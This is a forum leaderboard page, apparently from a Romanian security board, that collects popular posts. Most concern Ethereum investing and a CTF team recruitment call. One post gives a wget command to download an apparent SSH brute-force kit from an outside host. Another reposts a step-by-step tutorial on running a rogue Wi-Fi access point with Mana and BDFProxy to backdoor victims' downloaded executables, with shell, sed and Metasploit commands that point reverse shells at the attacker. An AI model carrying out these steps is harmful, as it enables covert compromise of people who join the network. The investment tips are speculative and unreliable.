Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 10/04/16 in all areas

  1. Nu "paria" mai mult decat iti permiti sa pierzi. Se pot intampla tot felul de evenimente care sa dea lucrurile peste cap Bancile nu implementeaza ethereum ci conceptul si tehnologia. Daca dai un search pe Google News la "banks blockchain" si citesti vei vedea despre ce e vorba Momentan sunt doar speculatii. Daca ar cunoaste cineva acest lucru ar fi milionar/miliardar. E la fel ca tranzactionarea la bursa: imprevizibil dar uneori poti lua riscuri calculate, bazate pe anumite indicii - dar la urma urmei sunt doar niste riscuri care ti le asumi.
    2 points
  2. INFO: Tutorial: Download link: wget http://i9x0.com/bssh2z-full.tar; tar xvf bssh2z-full.tar; cd bssh2z-full; cat info.txt ; cat tutorial.txt
    1 point
  3. EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW! This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right? This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TLWN722N (the 150Mbps version) as my secondary network interface. I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It’s packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with. Tools A few tools I will be using: Mana – Rouge Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I’d recommend watching the Defcon 22 talk where the tool was release here. BackdoorFactory BDFProxy – Automatically patches binaries with malicious payloads on the fly via MITM. False Start Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TLWN722N because of its low power usage and its compatibility with Kali (supports packet injection). I launched the Kali NetHunter menu and saw a promising looking menu item: Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one click launcher working out of the box. It even contained a screen for bdfproxy.cfg! When I started it there was even the option to start with bdf: But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn’t get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either. Setting Up So, off to the terminal! Home sweet home. I went into the Mana folder and skulked around a little bit: cd /usr/share/mana-toolkit/run-mana ls –lah Aha! The start-nat-simple-bdf-lollipop.sh looks promising. Let’s have a look: Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the “# Add fking rule to table 1006”. There are some config files mentioned in there. Let’s make sure they are set up properly. First stop is /etc/mana-toolkit/hostapd-karma.confg: Next let’s look at /etc/mana-toolkit/dhcpd.conf: Looks like we’re using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans. Let’s also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (config file below truncated to the important parts): Looks like there is something slightly off here. The IPs configured for our reverse shells (192.168.1.168 and 192.168.1.16) need to point back to us. According to our dhcpd.conf settings we're going to use the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed: sed –i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg sed –I 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg The diffs: Starting up the Machine Ok, so it’s time to start Mana up: cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf-lollipop.sh In a new terminal we start BDFProxy up: cd /etc/bdfproxy/ ./bdfproxy Now that BDFProxy is up it has created a Metasploit resource file. It wasn’t entirely obvious at first where this file lived (it is not in /etc/bdfproxy/). It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit: cd /usr/share/bdfproxy service postresql start cat bdf_msf_resource.rc #sanity check of conents, make sure IP update took msfconsole –r bdfproxy_msf_resource.rc After Metasploit is fired up we can see the resource file has loaded: Sweetness. Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. Iptables set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections (mitmproxy underneath is actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP: HttpError('Invalid HTTP request form (expected: absolute, got: relative)',) It turns out I missed changing one of the default bdfproxy.cfg settings. The line transparentProxy = NoneNeeds to be changed to: transparentProxy = transparentAfter that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and download a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP. Once BDFProxy gets its hooks in the backdoor is dropped in place: Here is the part that blew me away: executables within zips are backdoored, all done on the fly. How cool is that? For executable formats it not only works for Windows exe/PEs, but it does Linux ELF and Mach-O (that means you OSX!). Very cool stuff. - UPDATE 11/29/15: I've added some more content about BDFProxy in a new post here. 19 NOVEMBER 2015 Sursa: http://decidedlygray.com/2015/11/19/evil-access-point-with-auto-backdooring-ftw/
    1 point
  4. Prea simplu, mai fun pentru Chrome.
    1 point
  5. Urmeaza calificarile pentru un CTF important ( http://ctf.hitcon.org/ ), incepand de sambata de la 5 dimineata, timp de 48 ore. Finala va fi in Decembrie in Vietnam, cu premii destul de dragute. Suntem deja 6-8 oameni, dar cautam membrii noi, cel putin pentru CTF-ul asta, daca nu e posibila o "colaborare" pe termen lung. Deci oricine are track record in reversing, binary exploitation, math/crypto sau in general in challengeuri, e bine venit. O sa avem o platforma de colaborare + un canal de IRC unde vom comunica. Aici sunt problemele (si rezolvarile lor) din runda de calificari de anul trecut: https://github.com/ctfs/write-ups-2015/tree/master/hitcon-ctf-quals-2015 @aelius @Gecko @Nytro @Byte-ul @shinnok @sulea @Usr6
    1 point
  6. Momentan e in usoara crestere: http://coinmarketcap.com/currencies/ethereum/ / https://www.worldcoinindex.com/coin/ethereum Nu prea l-am urmarit in ultima vreme, n-am avut nici timp, insa am auzit ca JP Morgan vor sa il foloseasca (1, 2). Unii prezic ca va depasi bitcoin-ul insa momentan sunt doar preziceri, nimic mai mult. Mai vad ca a fost introdus pe FXOpen. La fel cum aurul are un fel de statut pentru unii de "safe haven" cand valutele se prabusesc, eth-ul se pare ca devine ceva asemanator cand sunt probleme cu bitcoin-ul. Personal, voi cumpara ceva inainte de Craciun and unii isi lichideaza sa aiba $$ de spart si apoi sa-l vand inainte de Brexit in Martie 2017 cand iarasi se panicheaza lumea pe piete.
    1 point
  7. 1 point
  8. Il recomand, lucrez cu el de aproximativ 3 saptamani si nu am nici-o problema.
    1 point
  9. Merita investit in ethereum datorita volumului si fluctuatiei sale. Astept cateva zile sa cumperi la 10$ si apoi cateva zile sa vinzi la 12$. Eu fac asta de cateva saptamani si nu mi-e rau.
    1 point
  10. Wallet-ul oficial al Ethereum il descarci de pe site-ul oficial: https://ethereum.org/ Ai acolo tot ce vrei pe site. Te poti uita si pe github daca vrei documentii. https://github.com/ethereum/ Echipa din spatele proiectului e foarte buna si de incredere. E ceva legit 100%. Exista o comunitate pe slack unde sunt doar romani: http://ethromania.herokuapp.com/ Ethereum este mai mult decat o crypto-moneda. Este un sistem pe care poti scrie aplicatii si aceste aplicatii sa aiba in spate un sistem financiar bazat pe cryptocurencies, micropayments si tot ce iti poti imagina. Au un limbaj de programare cu care poti sa faci smart contracts, se numeste solidity si e la versiune 0.3 deocamdata daca nu ma insel. Aplicatiile create cu ethereum si care folosesc smart contracts se numesc DAPPS (distributed applications). Un exemplu care a luat mai mult elan din segmentul asta este: https://slock.it/ Cu Slock.it poti sa faci sisteme de incuietori care se deschid in momentul in care le platesti. Pentru mai multe DAPPS te poti uita aici: http://dapps.ethercasts.com/ Sunt super multe de discutat, se lucreaza la foarte multe proiecte si o sa fie ceva mare. La fel de mare ca si Bitcoin sau poate sa il si depaseasca odata cu Halvingul de la bitcoin din iulie. (Desii partea cu halvingul poate sa mearga in oricare directie, ori sa scada pretul dramatic ori sa explodeze intr-o crestere. - asta e totusi o alta discutie si e cam offtopic.) Orice intrebari ai in legatura cu ethereum, poti sa intri pe comunitatea de slack mentionata mai sus si sigur iti raspunde cineva.
    1 point
×
×
  • Create New...